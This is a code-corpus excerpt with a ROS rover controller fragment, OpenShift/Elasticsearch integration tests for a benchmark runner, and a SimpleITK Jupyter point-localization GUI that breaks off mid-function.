self._odometry.update_2(wheel_servo_pos, time)
def _publish_tf(self, time):
''' Publish the transform from 'odom' to 'base_link'
Parameters
----------
time : rospy.Time
The current time.
'''
# Broadcast the transform from 'odom' to 'base_link'
self._odom_broadcaster.sendTransform(
(self._odometry.get_x(), self._odometry.get_y(), 0.0),
quaternion_from_euler(0.0, 0.0, self._odometry.get_heading()),
time,
'base_link',
'odom')
# @IMPLEMENT
def _update_state(self, time):
''' Update the rover's status
Parameters
----------
time : rospy.Time
The current time.
'''
pass
# @IMPLEMENT
def _publish_states(self, time):
''' Publish the rover's status
Parameters
----------
time : rospy.Time
The current time.
'''
pass
def _publish_encoders(self, time):
''' Publish the encoder state
'''
# Update the encoder messages
for i in range(BaseController.NUM_WHEELS):
servo = self._wheel_servos[i]
filter = self._encoder_filters[i]
pos, is_valid = filter.get_servo_pos(False)
msg = self._wheel_encoders[i]
msg.id = servo.id
msg.duty = filter.get_duty()
msg.position = pos
msg.is_valid = is_valid
msg.count = filter.get_count()
msg.revolutions = filter.get_revolutions()
# Publish
self._encoders_msg.header.stamp = time
self._encoders_msg.header.frame_id = 'base_link'
self._encoders_msg.wheel_encoders = self._wheel_encoders
self._encoders_pub.publish(self._encoders_msg)
```
|
{
"source": "jeniferh/benchmark-runner",
"score": 2
}
|
#### File: common/elasticsearch/test_es_operations.py
```python
import pytest
from uuid import uuid4
from benchmark_runner.common.oc.oc import OC
from benchmark_runner.common.elasticsearch.es_operations import ESOperations
from benchmark_runner.common.elasticsearch.elasticsearch_exceptions import ElasticSearchDataNotUploaded
from benchmark_runner.main.update_data_template_yaml_with_environment_variables import delete_generate_file, \
update_environment_variable
from benchmark_runner.benchmark_operator.benchmark_operator_workloads import BenchmarkOperatorWorkloads
from tests.integration.benchmark_runner.test_environment_variables import *
def __generate_pod_yamls():
"""
    This method creates a pod yaml from the template and injects environment variables into it
:return:
"""
update_environment_variable(dir_path=templates_path, yaml_file='stressng_pod_template.yaml', environment_variable_dict=test_environment_variable)
def __delete_pod_yamls():
"""
    This method deletes the stressng pod and its generated yaml if they exist
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
if oc._is_pod_exist(pod_name='stressng-pod-workload', namespace=test_environment_variable['namespace']):
oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
delete_generate_file(full_path_yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'))
@pytest.fixture(scope="session", autouse=True)
def before_after_all_tests_fixture():
"""
    This method creates the benchmark-operator pod once for ALL tests
:return:
"""
print('Install benchmark-operator pod')
# delete benchmark-operator pod if exist
benchmark_operator = BenchmarkOperatorWorkloads(kubeadmin_password=test_environment_variable['kubeadmin_password'], es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
benchmark_operator.make_undeploy_benchmark_controller_manager_if_exist(runner_path=test_environment_variable['runner_path'])
benchmark_operator.make_deploy_benchmark_controller_manager(runner_path=test_environment_variable['runner_path'])
yield
print('Delete benchmark-operator pod')
benchmark_operator.make_undeploy_benchmark_controller_manager(runner_path=test_environment_variable['runner_path'])
@pytest.fixture(autouse=True)
def before_after_each_test_fixture():
"""
    This method generates the yaml before and clears it after EACH test
:return:
"""
# before each test
__generate_pod_yamls()
yield
    # after each test
__delete_pod_yamls()
print('Test End')
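# Example invocation (illustrative; the exact path and required environment
# variables depend on the repository layout and test_environment_variables):
#     python -m pytest tests/integration/benchmark_runner/common/elasticsearch/test_es_operations.py -s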
def test_verify_es_data_uploaded_stressng_pod():
"""
    This method verifies that the data is uploaded properly to Elasticsearch
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
try:
workload = 'stressng-pod'
oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name=f'{workload}-workload')
oc.wait_for_initialized(label='app=stressng_workload', workload=workload)
oc.wait_for_ready(label='app=stressng_workload', workload=workload)
oc.wait_for_pod_completed(label='app=stressng_workload', workload=workload)
# system-metrics
if test_environment_variable['system_metrics'] == 'True':
es = ESOperations(es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
assert oc.wait_for_pod_create(pod_name='system-metrics-collector')
assert oc.wait_for_initialized(label='app=system-metrics-collector', workload=workload)
assert oc.wait_for_pod_completed(label='app=system-metrics-collector', workload=workload)
assert es.verify_es_data_uploaded(index='system-metrics-test', uuid=oc.get_long_uuid(workload=workload))
if test_environment_variable['elasticsearch']:
# verify that data upload to elastic search
es = ESOperations(es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
assert es.verify_es_data_uploaded(index='stressng-pod-test-results', uuid=oc.get_long_uuid(workload=workload))
except ElasticSearchDataNotUploaded as err:
raise err
except Exception as err:
raise err
```
#### File: common/oc/test_oc.py
```python
import time
import pytest
from benchmark_runner.common.oc.oc import OC
from benchmark_runner.common.oc.oc_exceptions import LoginFailed, PodNotCreateTimeout, PodTerminateTimeout, VMNotCreateTimeout, YAMLNotExist
from benchmark_runner.common.elasticsearch.es_operations import ESOperations
from benchmark_runner.main.update_data_template_yaml_with_environment_variables import delete_generate_file, update_environment_variable
from benchmark_runner.benchmark_operator.benchmark_operator_workloads import BenchmarkOperatorWorkloads
from tests.integration.benchmark_runner.test_environment_variables import *
def __generate_pod_yamls():
"""
    This method creates a pod yaml from the template and injects environment variables into it
:return:
"""
update_environment_variable(dir_path=templates_path, yaml_file='stressng_pod_template.yaml', environment_variable_dict=test_environment_variable)
def __generate_kata_yamls():
"""
    This method creates a kata yaml from the template and injects environment variables into it
:return:
"""
update_environment_variable(dir_path=templates_path, yaml_file='stressng_kata_template.yaml', environment_variable_dict=test_environment_variable)
def __generate_vm_yamls():
"""
    This method creates a vm yaml from the template and injects environment variables into it
:return:
"""
update_environment_variable(dir_path=templates_path, yaml_file='stressng_vm_template.yaml', environment_variable_dict=test_environment_variable)
def __delete_pod_yamls():
"""
    This method deletes the pod yaml if it exists
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
if oc._is_pod_exist(pod_name='stressng-pod-workload', namespace=test_environment_variable['namespace']):
oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
delete_generate_file(full_path_yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'))
def __delete_kata_yamls():
"""
    This method deletes the kata yaml if it exists
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
if oc._is_pod_exist(pod_name='stressng-kata-workload', namespace=test_environment_variable['namespace']):
oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_kata.yaml'), pod_name='stressng-kata-workload')
delete_generate_file(full_path_yaml=os.path.join(f'{templates_path}', 'stressng_kata.yaml'))
def __delete_vm_yamls():
"""
    This method deletes the vm yaml if it exists
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
if oc._is_vmi_exist(vm_name='stressng-vm-workload', namespace=test_environment_variable['namespace']):
oc.delete_vm_sync(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'), vm_name='stressng-vm-workload')
delete_generate_file(full_path_yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'))
@pytest.fixture(scope="session", autouse=True)
def before_after_all_tests_fixture():
"""
    This method creates the benchmark-operator pod once for ALL tests
:return:
"""
print('Install benchmark-operator pod')
benchmark_operator = BenchmarkOperatorWorkloads(kubeadmin_password=test_environment_variable['kubeadmin_password'],
es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
benchmark_operator.make_undeploy_benchmark_controller_manager_if_exist(runner_path=test_environment_variable['runner_path'])
benchmark_operator.make_deploy_benchmark_controller_manager(runner_path=test_environment_variable['runner_path'])
yield
print('Delete benchmark-operator pod')
benchmark_operator.make_undeploy_benchmark_controller_manager(runner_path=test_environment_variable['runner_path'])
@pytest.fixture(autouse=True)
def before_after_each_test_fixture():
"""
    This method generates the yamls before and clears them after EACH test
:return:
"""
    # before each test: setup
__generate_pod_yamls()
__generate_kata_yamls()
__generate_vm_yamls()
yield
    # after each test: teardown
__delete_pod_yamls()
__delete_kata_yamls()
__delete_vm_yamls()
print('Test End')
###################################################### POD Tests ##################################################
def test_oc_get_pod_name_and_is_pod_exist():
"""
    This method tests _get_pod_name and _is_pod_exist
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc._get_pod_name(pod_name='benchmark-controller-manager', namespace=test_environment_variable['namespace'])
assert oc._is_pod_exist(pod_name='benchmark-controller-manager', namespace=test_environment_variable['namespace'])
def test_yaml_file_not_exist_error():
"""
    This method verifies that creating a pod from a missing yaml raises YAMLNotExist
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
with pytest.raises(YAMLNotExist) as err:
oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng1.yaml'), pod_name='stressng-pod-workload', timeout=-1)
def test_create_sync_pod_timeout_error():
"""
    This method verifies that creating a pod with a negative timeout raises PodNotCreateTimeout
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
with pytest.raises(PodNotCreateTimeout) as err:
oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload', timeout=-1)
def test_delete_sync_pod_timeout_error():
"""
    This method verifies that deleting a pod with a negative timeout raises PodTerminateTimeout
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
with pytest.raises(PodTerminateTimeout) as err:
oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload', timeout=-1)
def test_get_long_short_uuid():
"""
    This method tests the short and long uuid
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
assert len(oc.get_long_uuid(workload='stressng-pod')) == 36
assert len(oc._OC__get_short_uuid(workload='stressng-pod')) == 8
@pytest.mark.skip(reason="Already verified in 'test_es_operations:test_verify_es_data_uploaded_stressng_pod' ")
def test_wait_for_pod_create_initialized_ready_completed_system_metrics_deleted():
"""
    This method tests waiting for pod create, initialized, ready, completed, system-metrics, delete
:return:
"""
workload = 'stressng-pod'
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
assert oc.wait_for_initialized(label='app=stressng_workload', workload=workload)
assert oc.wait_for_ready(label='app=stressng_workload', workload=workload)
assert oc.wait_for_pod_completed(label='app=stressng_workload', workload=workload)
# system-metrics
assert oc.wait_for_pod_create(pod_name='system-metrics-collector')
assert oc.wait_for_initialized(label='app=system-metrics-collector', workload=workload)
assert oc.wait_for_pod_completed(label='app=system-metrics-collector', workload=workload)
assert oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
def test_wait_for_kata_create_initialized_ready_completed_system_metrics_deleted():
"""
    This method tests waiting for kata pod create, initialized, ready, completed, system-metrics, delete
:return:
"""
workload = 'stressng-kata'
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_kata.yaml'), pod_name='stressng-kata-workload')
assert oc.wait_for_initialized(label='app=stressng_workload', workload=workload)
assert oc.wait_for_ready(label='app=stressng_workload', workload=workload)
assert oc.wait_for_pod_completed(label='app=stressng_workload', workload=workload)
# system-metrics
assert oc.wait_for_pod_create(pod_name='system-metrics-collector')
assert oc.wait_for_initialized(label='app=system-metrics-collector', workload=workload)
assert oc.wait_for_pod_completed(label='app=system-metrics-collector', workload=workload)
assert oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_kata.yaml'), pod_name='stressng-kata-workload')
###################################################### VM Tests ##################################################
def test_create_sync_vm_timeout_error():
"""
    This method verifies that creating a vm with a negative timeout raises VMNotCreateTimeout
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
with pytest.raises(VMNotCreateTimeout) as err:
oc.create_vm_sync(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'), vm_name='stressng-vm-workload', timeout=-1)
@pytest.mark.skip(reason="Already verified in: test_vm_create_initialized_ready_completed_system_metrics_deleted ")
def test_oc_get_vmi_name_and_is_vmi_exist():
"""
    This method tests _get_vmi_name and _is_vmi_exist
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
oc._create_async(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'))
# wait 60 sec till vm will be created
time.sleep(60)
assert oc._get_vmi_name(vm_name='stressng-vm-workload', namespace=test_environment_variable['namespace'])
assert oc._is_vmi_exist(vm_name='stressng-vm-workload', namespace=test_environment_variable['namespace'])
@pytest.mark.skip(reason="Already verified in: test_vm_create_initialized_ready_completed_system_metrics_deleted ")
def test_wait_for_vm_created():
"""
    This method waits for the vm to be created
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
oc._create_async(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'))
assert oc.wait_for_vm_create(vm_name='stressng-vm-workload')
def test_vm_create_initialized_ready_completed_system_metrics_deleted():
"""
    This method tests vm create, get_vmi, initialized, ready, completed, system-metrics, deleted.
    Requires a running Elasticsearch server.
:return:
"""
workload = 'stressng-vm'
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.create_vm_sync(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'), vm_name='stressng-vm-workload')
assert oc.get_vmi()
assert oc.wait_for_initialized(label='app=stressng_workload', workload=workload)
assert oc.wait_for_ready(label='app=stressng_workload', workload=workload)
assert oc.wait_for_vm_completed(workload=workload)
# system-metrics
if test_environment_variable['system_metrics'] == 'True':
es = ESOperations(es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
assert oc.wait_for_pod_create(pod_name='system-metrics-collector')
assert oc.wait_for_initialized(label='app=system-metrics-collector', workload=workload)
assert oc.wait_for_pod_completed(label='app=system-metrics-collector', workload=workload)
assert es.verify_es_data_uploaded(index='system-metrics-test', uuid=oc.get_long_uuid(workload=workload))
if test_environment_variable['elasticsearch']:
es = ESOperations(es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
assert es.verify_es_data_uploaded(index='stressng-vm-test-results', uuid=oc.get_long_uuid(workload=workload))
assert oc.delete_vm_sync(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'),
vm_name='stressng-vm-workload')
```
|
{
"source": "JenifferWuUCLA/pulmonary-nodules-SimpleITK",
"score": 3
}
|
#### File: pulmonary-nodules-SimpleITK/Python/gui.py
```python
import SimpleITK as sitk
import matplotlib.pyplot as plt
import ipywidgets as widgets
from IPython.display import display
import numpy as np
from matplotlib.widgets import RectangleSelector
import matplotlib.patches as patches
class RegistrationPointDataAquisition(object):
"""
    This class provides a GUI for localizing corresponding points in two images, and for evaluating registration results using a linked cursor
    approach: the user clicks in one image and the corresponding point is added to the other image.
"""
def __init__(self, fixed_image, moving_image, fixed_window_level= None, moving_window_level= None, figure_size=(10,8), known_transformation=None):
self.fixed_image = fixed_image
self.fixed_npa, self.fixed_min_intensity, self.fixed_max_intensity = self.get_window_level_numpy_array(self.fixed_image, fixed_window_level)
self.moving_image = moving_image
self.moving_npa, self.moving_min_intensity, self.moving_max_intensity = self.get_window_level_numpy_array(self.moving_image, moving_window_level)
self.fixed_point_indexes = []
self.moving_point_indexes = []
self.click_history = [] # Keep a history of user point localizations, enabling undo of last localization.
self.known_transformation = known_transformation # If the transformation is valid (not None) then corresponding points are automatically added.
self.text_and_marker_color = 'red'
# Create a figure with two axes for the fixed and moving images.
self.fig, axes = plt.subplots(1,2,figsize=figure_size)
#self.fig.canvas.set_window_title('Registration Points Acquisition')
self.fixed_axes = axes[0]
self.moving_axes = axes[1]
# Connect the mouse button press to the canvas (__call__ method is the invoked callback).
self.fig.canvas.mpl_connect('button_press_event', self)
ui = self.create_ui()
# Display the data and the controls, first time we display the images is outside the "update_display" method
# as that method relies on the previous zoom factor which doesn't exist yet.
self.fixed_axes.imshow(self.fixed_npa[self.fixed_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.fixed_min_intensity,
vmax=self.fixed_max_intensity)
self.moving_axes.imshow(self.moving_npa[self.moving_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.moving_min_intensity,
vmax=self.moving_max_intensity)
self.update_display()
display(ui)
def create_ui(self):
        # Create the active UI components. Height and width are specified in 'em' units. This is
        # an html size specification, relative to the current font size.
self.viewing_checkbox = widgets.RadioButtons(description= 'Interaction mode:',
options= ['edit', 'view'],
value = 'edit')
self.clearlast_button = widgets.Button(description= 'Clear Last',
width= '7em',
height= '3em')
self.clearlast_button.on_click(self.clear_last)
self.clearall_button = widgets.Button(description= 'Clear All',
width= '7em',
height= '3em')
self.clearall_button.on_click(self.clear_all)
self.fixed_slider = widgets.IntSlider(description='fixed image z slice:',
min=0,
max=self.fixed_npa.shape[0]-1,
step=1,
value = int((self.fixed_npa.shape[0]-1)/2),
width='20em')
self.fixed_slider.observe(self.on_slice_slider_value_change, names='value')
self.moving_slider = widgets.IntSlider(description='moving image z slice:',
min=0,
max=self.moving_npa.shape[0]-1,
step=1,
value = int((self.moving_npa.shape[0]-1)/2),
width='19em')
self.moving_slider.observe(self.on_slice_slider_value_change, names='value')
# Layout of UI components. This is pure ugliness because we are not using a UI toolkit. Layout is done
# using the box widget and padding so that the visible UI components are spaced nicely.
bx0 = widgets.Box(padding=7, children=[self.fixed_slider, self.moving_slider])
bx1 = widgets.Box(padding=7, children = [self.viewing_checkbox])
bx2 = widgets.Box(padding = 15, children = [self.clearlast_button])
bx3 = widgets.Box(padding = 15, children = [self.clearall_button])
return widgets.HBox(children=[widgets.HBox(children=[bx1, bx2, bx3]),bx0])
def get_window_level_numpy_array(self, image, window_level):
"""
Get the numpy array representation of the image and the min and max of the intensities
used for display.
"""
npa = sitk.GetArrayViewFromImage(image)
if not window_level:
return npa, npa.min(), npa.max()
else:
return npa, window_level[1]-window_level[0]/2.0, window_level[1]+window_level[0]/2.0
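    # Illustrative example (not part of the original class): for a CT
    # soft-tissue setting window_level = (350, 40), i.e. window 350 and
    # level 40, the displayed range becomes
    #     vmin = 40 - 350/2.0 = -135,  vmax = 40 + 350/2.0 = 215
    # so intensities outside [-135, 215] are clamped to black/white.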
def on_slice_slider_value_change(self, change):
self.update_display()
def update_display(self):
"""
Display the two images based on the slider values and the points which are on the
displayed slices.
"""
        # We want to keep the zoom factor which was set prior to display, so we record it before
        # clearing the axes.
fixed_xlim = self.fixed_axes.get_xlim()
fixed_ylim = self.fixed_axes.get_ylim()
moving_xlim = self.moving_axes.get_xlim()
moving_ylim = self.moving_axes.get_ylim()
# Draw the fixed image in the first subplot and the localized points.
self.fixed_axes.clear()
self.fixed_axes.imshow(self.fixed_npa[self.fixed_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.fixed_min_intensity,
vmax=self.fixed_max_intensity)
# Positioning the text is a bit tricky, we position relative to the data coordinate system, but we
# want to specify the shift in pixels as we are dealing with display. We therefore (a) get the data
# point in the display coordinate system in pixel units (b) modify the point using pixel offset and
# transform back to the data coordinate system for display.
text_x_offset = -10
text_y_offset = -10
for i, pnt in enumerate(self.fixed_point_indexes):
if pnt[2] == self.fixed_slider.value:
self.fixed_axes.scatter(pnt[0], pnt[1], s=90, marker='+', color=self.text_and_marker_color)
# Get point in pixels.
text_in_data_coords = self.fixed_axes.transData.transform([pnt[0],pnt[1]])
# Offset in pixels and get in data coordinates.
text_in_data_coords = self.fixed_axes.transData.inverted().transform((text_in_data_coords[0]+text_x_offset, text_in_data_coords[1]+text_y_offset))
self.fixed_axes.text(text_in_data_coords[0], text_in_data_coords[1], str(i), color=self.text_and_marker_color)
self.fixed_axes.set_title('fixed image - localized {0} points'.format(len(self.fixed_point_indexes)))
self.fixed_axes.set_axis_off()
# Draw the moving image in the second subplot and the localized points.
self.moving_axes.clear()
self.moving_axes.imshow(self.moving_npa[self.moving_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.moving_min_intensity,
vmax=self.moving_max_intensity)
for i, pnt in enumerate(self.moving_point_indexes):
if pnt[2] == self.moving_slider.value:
self.moving_axes.scatter(pnt[0], pnt[1], s=90, marker='+', color=self.text_and_marker_color)
text_in_data_coords = self.moving_axes.transData.transform([pnt[0],pnt[1]])
text_in_data_coords = self.moving_axes.transData.inverted().transform((text_in_data_coords[0]+text_x_offset, text_in_data_coords[1]+text_y_offset))
self.moving_axes.text(text_in_data_coords[0], text_in_data_coords[1], str(i), color=self.text_and_marker_color)
self.moving_axes.set_title('moving image - localized {0} points'.format(len(self.moving_point_indexes)))
self.moving_axes.set_axis_off()
# Set the zoom factor back to what it was before we cleared the axes, and rendered our data.
self.fixed_axes.set_xlim(fixed_xlim)
self.fixed_axes.set_ylim(fixed_ylim)
self.moving_axes.set_xlim(moving_xlim)
self.moving_axes.set_ylim(moving_ylim)
self.fig.canvas.draw_idle()
def clear_all(self, button):
"""
Get rid of all the data.
"""
del self.fixed_point_indexes[:]
del self.moving_point_indexes[:]
del self.click_history[:]
self.update_display()
def clear_last(self, button):
"""
Remove last point or point-pair addition (depends on whether the interface is used for localizing point pairs or
evaluation of registration).
"""
if self.click_history:
if self.known_transformation:
self.click_history.pop().pop()
self.click_history.pop().pop()
self.update_display()
def get_points(self):
"""
Get the points in the image coordinate systems.
"""
if(len(self.fixed_point_indexes) != len(self.moving_point_indexes)):
raise Exception('Number of localized points in fixed and moving images does not match.')
fixed_point_list = [self.fixed_image.TransformContinuousIndexToPhysicalPoint(pnt) for pnt in self.fixed_point_indexes]
moving_point_list = [self.moving_image.TransformContinuousIndexToPhysicalPoint(pnt) for pnt in self.moving_point_indexes]
return fixed_point_list, moving_point_list
def __call__(self, event):
"""
Callback invoked when the user clicks inside the figure.
"""
        # We add points only in 'edit' mode. If the spatial transformation between the two images is known
        # (self.known_transformation was set), then every button_press_event generates a point in each of the
        # images. Finally, we enforce that every point has a corresponding point in the other image by not
        # allowing the user to add multiple points in the same image; they have to alternate between the two images.
if self.viewing_checkbox.value == 'edit':
if event.inaxes==self.fixed_axes:
if len(self.fixed_point_indexes) - len(self.moving_point_indexes)<=0:
self.fixed_point_indexes.append((event.xdata, event.ydata, self.fixed_slider.value))
self.click_history.append(self.fixed_point_indexes)
if self.known_transformation:
moving_point_physical = self.known_transformation.TransformPoint(self.fixed_image.TransformContinuousIndexToPhysicalPoint(self.fixed_point_indexes[-1]))
moving_point_indexes = self.moving_image.TransformPhysicalPointToIndex(moving_point_physical)
self.moving_point_indexes.append(moving_point_indexes)
self.click_history.append(self.moving_point_indexes)
if self.moving_slider.max>=moving_point_indexes[2] and self.moving_slider.min<=moving_point_indexes[2]:
self.moving_slider.value = moving_point_indexes[2]
self.update_display()
if event.inaxes==self.moving_axes:
if len(self.moving_point_indexes) - len(self.fixed_point_indexes)<=0:
self.moving_point_indexes.append((event.xdata, event.ydata, self.moving_slider.value))
self.click_history.append(self.moving_point_indexes)
if self.known_transformation:
inverse_transform = self.known_transformation.GetInverse()
fixed_point_physical = inverse_transform.TransformPoint(self.moving_image.TransformContinuousIndexToPhysicalPoint(self.moving_point_indexes[-1]))
fixed_point_indexes = self.fixed_image.TransformPhysicalPointToIndex(fixed_point_physical)
self.fixed_point_indexes.append(fixed_point_indexes)
self.click_history.append(self.fixed_point_indexes)
if self.fixed_slider.max>=fixed_point_indexes[2] and self.fixed_slider.min<=fixed_point_indexes[2]:
self.fixed_slider.value = fixed_point_indexes[2]
self.update_display()
class PointDataAquisition(object):
def __init__(self, image, window_level= None, figure_size=(10,8)):
self.image = image
self.npa, self.min_intensity, self.max_intensity = self.get_window_level_numpy_array(self.image, window_level)
self.point_indexes = []
# Create a figure.
self.fig, self.axes = plt.subplots(1,1,figsize=figure_size)
# Connect the mouse button press to the canvas (__call__ method is the invoked callback).
self.fig.canvas.mpl_connect('button_press_event', self)
ui = self.create_ui()
        # Display the data and the controls. The first time we display the image is outside the "update_display" method,
        # as that method relies on the previous zoom factor which doesn't exist yet.
self.axes.imshow(self.npa[self.slice_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.min_intensity,
vmax=self.max_intensity)
self.update_display()
display(ui)
def create_ui(self):
# Create the active UI components. Height and width are specified in 'em' units. This is
        # an HTML size specification, i.e., size relative to the current font size.
self.viewing_checkbox = widgets.RadioButtons(description= 'Interaction mode:',
options= ['edit', 'view'],
value = 'edit')
self.clearlast_button = widgets.Button(description= 'Clear Last',
width= '7em',
height= '3em')
self.clearlast_button.on_click(self.clear_last)
self.clearall_button = widgets.Button(description= 'Clear All',
width= '7em',
height= '3em')
self.clearall_button.on_click(self.clear_all)
self.slice_slider = widgets.IntSlider(description='image z slice:',
min=0,
max=self.npa.shape[0]-1,
step=1,
value = int((self.npa.shape[0]-1)/2),
width='20em')
self.slice_slider.observe(self.on_slice_slider_value_change, names='value')
# Layout of UI components. This is pure ugliness because we are not using a UI toolkit. Layout is done
# using the box widget and padding so that the visible UI components are spaced nicely.
bx0 = widgets.Box(padding=7, children=[self.slice_slider])
bx1 = widgets.Box(padding=7, children = [self.viewing_checkbox])
bx2 = widgets.Box(padding = 15, children = [self.clearlast_button])
bx3 = widgets.Box(padding = 15, children = [self.clearall_button])
return widgets.HBox(children=[widgets.HBox(children=[bx1, bx2, bx3]),bx0])
def get_window_level_numpy_array(self, image, window_level):
npa = sitk.GetArrayViewFromImage(image)
if not window_level:
return npa, npa.min(), npa.max()
else:
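            # window_level is assumed to be a (window, level) pair, so the displayed intensity
            # range is [level - window/2, level + window/2].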
return npa, window_level[1]-window_level[0]/2.0, window_level[1]+window_level[0]/2.0
def on_slice_slider_value_change(self, change):
self.update_display()
def update_display(self):
# We want to keep the zoom factor which was set prior to display, so we log it before
# clearing the axes.
xlim = self.axes.get_xlim()
ylim = self.axes.get_ylim()
# Draw the image and localized points.
self.axes.clear()
self.axes.imshow(self.npa[self.slice_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.min_intensity,
vmax=self.max_intensity)
        # Positioning the text is a bit tricky: we position relative to the data coordinate system, but we
        # want to specify the shift in pixels as we are dealing with display. We therefore (a) get the data
        # point in the display coordinate system in pixel units, (b) modify the point using the pixel offset and
        # (c) transform back to the data coordinate system for display.
text_x_offset = -10
text_y_offset = -10
for i, pnt in enumerate(self.point_indexes):
if pnt[2] == self.slice_slider.value:
self.axes.scatter(pnt[0], pnt[1], s=90, marker='+', color='yellow')
# Get point in pixels.
text_in_data_coords = self.axes.transData.transform([pnt[0],pnt[1]])
# Offset in pixels and get in data coordinates.
text_in_data_coords = self.axes.transData.inverted().transform((text_in_data_coords[0]+text_x_offset, text_in_data_coords[1]+text_y_offset))
self.axes.text(text_in_data_coords[0], text_in_data_coords[1], str(i), color='yellow')
self.axes.set_title('localized {0} points'.format(len(self.point_indexes)))
self.axes.set_axis_off()
# Set the zoom factor back to what it was before we cleared the axes, and rendered our data.
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.fig.canvas.draw_idle()
def add_point_indexes(self, point_index_data):
self.validate_points(point_index_data)
self.point_indexes.append(list(point_index_data))
self.update_display()
def set_point_indexes(self, point_index_data):
self.validate_points(point_index_data)
del self.point_indexes[:]
self.point_indexes = list(point_index_data)
self.update_display()
def validate_points(self, point_index_data):
for p in point_index_data:
if p[0]>=self.npa.shape[2] or p[0]<0 or p[1]>=self.npa.shape[1] or p[1]<0 or p[2]>=self.npa.shape[0] or p[2]<0:
raise ValueError('Given point (' + ', '.join(map(str,p)) + ') is outside the image bounds.')
def clear_all(self, button):
del self.point_indexes[:]
self.update_display()
def clear_last(self, button):
if self.point_indexes:
self.point_indexes.pop()
self.update_display()
def get_points(self):
return [self.image.TransformContinuousIndexToPhysicalPoint(pnt) for pnt in self.point_indexes]
def get_point_indexes(self):
'''
        Return the point indexes, not the continuous index we keep.
'''
# Round and then cast to int, just rounding will return a float
return [tuple(map(lambda x: int(round(x)), pnt)) for pnt in self.point_indexes]
def __call__(self, event):
if self.viewing_checkbox.value == 'edit':
if event.inaxes==self.axes:
self.point_indexes.append((event.xdata, event.ydata, self.slice_slider.value))
self.update_display()
def multi_image_display2D(image_list, title_list=None, window_level_list= None, figure_size=(10,8), horizontal=True):
if title_list:
if len(image_list)!=len(title_list):
raise ValueError('Title list and image list lengths do not match')
else:
title_list = ['']*len(image_list)
# Create a figure.
col_num, row_num = (len(image_list), 1) if horizontal else (1, len(image_list))
fig, axes = plt.subplots(row_num, col_num, figsize=figure_size)
if len(image_list)==1:
axes = [axes]
# Get images as numpy arrays for display and the window level settings
npa_list = list(map(sitk.GetArrayViewFromImage, image_list))
if not window_level_list:
min_intensity_list = list(map(np.min, npa_list))
max_intensity_list = list(map(np.max, npa_list))
else:
min_intensity_list = list(map(lambda x: x[1]-x[0]/2.0, window_level_list))
max_intensity_list = list(map(lambda x: x[1]+x[0]/2.0, window_level_list))
